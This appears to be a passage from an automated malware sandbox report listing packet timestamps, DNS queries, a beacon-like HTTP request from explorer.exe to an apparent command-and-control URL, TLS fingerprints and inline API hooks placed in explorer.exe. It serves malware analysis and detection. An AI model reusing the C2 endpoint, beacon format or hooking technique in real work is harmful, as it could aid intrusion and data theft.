                                        Jul 22, 2021 17:59:33.918967962 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.918968916 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.918977976 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.918983936 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.918997049 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919019938 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919034958 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919045925 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919054031 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919074059 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919080973 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919102907 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919102907 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919128895 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919143915 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919164896 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919176102 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919205904 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919213057 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919239044 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919272900 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919286966 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919294119 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919296980 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919327974 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919341087 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919353008 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919367075 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919382095 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919408083 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919409990 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919444084 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919454098 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919469118 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919481039 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919506073 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919521093 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919564009 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919668913 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919853926 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919878006 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919899940 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.919936895 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919971943 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.919977903 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920001984 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920022964 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920039892 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920059919 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920064926 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920079947 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920097113 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920116901 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920123100 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920141935 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920159101 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920176029 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920201063 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920228004 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920243025 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920253038 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920269966 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920279980 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920305014 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920310974 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920325041 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920339108 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920383930 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920414925 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920686960 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920711040 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920749903 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920773029 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920779943 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920800924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920808077 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920838118 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920844078 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920866013 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920878887 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920893908 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920907021 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920922041 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920936108 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920948029 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.920968056 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.920978069 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921005011 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921031952 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921031952 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921063900 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921066999 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921099901 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921102047 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921128035 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921129942 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921158075 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921159983 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921186924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921190977 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921219110 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921221018 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921233892 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921247959 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921276093 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921278954 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921303988 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921318054 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921346903 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921371937 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921657085 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921680927 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921704054 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921736956 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921737909 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921766996 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921768904 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921794891 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921817064 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921843052 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921905041 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921950102 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.921962023 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.921976089 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922004938 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922004938 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922034025 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922040939 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922051907 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922060966 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922081947 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922089100 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922106981 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922116041 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922158957 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922192097 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922199965 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922233105 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922250032 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922257900 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922283888 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922286987 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922314882 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922318935 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922338963 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922359943 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922368050 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.922413111 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.922431946 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924175024 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924211979 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924242973 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924269915 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924299002 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924325943 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924329042 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924356937 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924382925 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924398899 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924405098 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924411058 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924433947 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924444914 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924474955 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924495935 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924506903 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924514055 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924557924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924561977 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924591064 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924612045 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924622059 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924635887 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924654007 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924673080 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924680948 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924701929 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924709082 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924731016 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924736977 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924757004 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924765110 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924786091 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924792051 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924817085 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924822092 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924843073 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924853086 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924870014 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924882889 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924897909 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924911022 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924932957 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924933910 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924962044 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924962044 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.924989939 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.924989939 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.925005913 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.925019026 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.925040960 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.925048113 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.925062895 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.925080061 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.925096035 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.925111055 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.925126076 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.925151110 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.925169945 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.925179958 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.925204039 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.927957058 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.936695099 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.950690031 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:50.649718046 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 18:00:58.195909023 CEST4972480192.168.2.5192.185.17.130
                                        Jul 22, 2021 18:00:58.357115984 CEST8049724192.185.17.130192.168.2.5
                                        Jul 22, 2021 18:00:58.357371092 CEST4972480192.168.2.5192.185.17.130
                                        Jul 22, 2021 18:00:58.357666969 CEST4972480192.168.2.5192.185.17.130
                                        Jul 22, 2021 18:00:58.516818047 CEST8049724192.185.17.130192.168.2.5
                                        Jul 22, 2021 18:00:58.868906975 CEST4972480192.168.2.5192.185.17.130
                                        Jul 22, 2021 18:00:59.068749905 CEST8049724192.185.17.130192.168.2.5
                                        Jul 22, 2021 18:00:59.770776987 CEST8049724192.185.17.130192.168.2.5
                                        Jul 22, 2021 18:00:59.770858049 CEST4972480192.168.2.5192.185.17.130
                                        Jul 22, 2021 18:00:59.771173000 CEST8049724192.185.17.130192.168.2.5
                                        Jul 22, 2021 18:00:59.771307945 CEST4972480192.168.2.5192.185.17.130

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 22, 2021 17:59:15.966249943 CEST5479553192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:16.018271923 CEST53547958.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:17.030975103 CEST4955753192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:17.081573963 CEST53495578.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:17.835160017 CEST6173353192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:17.887351990 CEST53617338.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:18.366911888 CEST6544753192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:18.432480097 CEST53654478.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:19.198745966 CEST5244153192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:19.248092890 CEST53524418.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:20.662686110 CEST6217653192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:20.712065935 CEST53621768.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:21.769877911 CEST5959653192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:21.819135904 CEST53595968.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:22.737807035 CEST6529653192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:22.795145988 CEST53652968.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:23.640221119 CEST6318353192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:23.689425945 CEST53631838.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:25.277851105 CEST6015153192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:25.334655046 CEST53601518.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:32.378942013 CEST5696953192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:32.429265022 CEST53569698.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:32.432296038 CEST5516153192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:32.489460945 CEST53551618.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:33.240242004 CEST5475753192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:33.302604914 CEST53547578.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:42.491311073 CEST4999253192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:42.574757099 CEST53499928.8.8.8192.168.2.5
                                        Jul 22, 2021 17:59:49.367983103 CEST6007553192.168.2.58.8.8.8
                                        Jul 22, 2021 17:59:49.435719013 CEST53600758.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:09.963759899 CEST5501653192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:10.026026964 CEST53550168.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:13.805746078 CEST6434553192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:13.880527973 CEST53643458.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:26.398986101 CEST5712853192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:26.463774920 CEST53571288.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:30.650922060 CEST5479153192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:30.700320959 CEST53547918.8.8.8192.168.2.5
                                        Jul 22, 2021 18:00:57.994560957 CEST5046353192.168.2.58.8.8.8
                                        Jul 22, 2021 18:00:58.188177109 CEST53504638.8.8.8192.168.2.5
                                        Jul 22, 2021 18:01:04.873130083 CEST5039453192.168.2.58.8.8.8
                                        Jul 22, 2021 18:01:04.944116116 CEST53503948.8.8.8192.168.2.5
                                        Jul 22, 2021 18:01:07.035242081 CEST5853053192.168.2.58.8.8.8
                                        Jul 22, 2021 18:01:07.109100103 CEST53585308.8.8.8192.168.2.5
                                        Jul 22, 2021 18:01:19.086133957 CEST5381353192.168.2.58.8.8.8
                                        Jul 22, 2021 18:01:19.148035049 CEST53538138.8.8.8192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jul 22, 2021 17:59:32.378942013 CEST192.168.2.58.8.8.80xa53fStandard query (0)google.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:32.432296038 CEST192.168.2.58.8.8.80xb7caStandard query (0)google.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.240242004 CEST192.168.2.58.8.8.80x4bc7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 18:00:57.994560957 CEST192.168.2.58.8.8.80xe518Standard query (0)www.rajuherbalandspicegarden.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 18:01:19.086133957 CEST192.168.2.58.8.8.80x8d59Standard query (0)www.strawberrylinebikehire.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jul 22, 2021 17:59:32.429265022 CEST8.8.8.8192.168.2.50xa53fNo error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:32.489460945 CEST8.8.8.8192.168.2.50xb7caNo error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 17:59:33.302604914 CEST8.8.8.8192.168.2.50x4bc7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                        Jul 22, 2021 18:00:58.188177109 CEST8.8.8.8192.168.2.50xe518No error (0)www.rajuherbalandspicegarden.comrajuherbalandspicegarden.comCNAME (Canonical name)IN (0x0001)
                                        Jul 22, 2021 18:00:58.188177109 CEST8.8.8.8192.168.2.50xe518No error (0)rajuherbalandspicegarden.com192.185.17.130A (IP address)IN (0x0001)
                                        Jul 22, 2021 18:01:19.148035049 CEST8.8.8.8192.168.2.50x8d59Name error (3)www.strawberrylinebikehire.comnonenoneA (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.rajuherbalandspicegarden.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.549724192.185.17.13080C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 22, 2021 18:00:58.357666969 CEST7373OUTGET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1
                                        Host: www.rajuherbalandspicegarden.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 22, 2021 18:00:59.770776987 CEST7375INHTTP/1.1 301 Moved Permanently
                                        Date: Thu, 22 Jul 2021 16:00:59 GMT
                                        Server: nginx/1.19.10
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        X-UA-Compatible: IE=edge
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        X-Redirect-By: WordPress
                                        Location: http://rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH
                                        X-Endurance-Cache-Level: 2
                                        X-Server-Cache: true
                                        X-Proxy-Cache: MISS


                                        HTTPS Packets

                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                        Jul 22, 2021 17:59:33.423166037 CEST162.159.134.233443192.168.2.549711CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE3
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE3
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE3
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE3

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

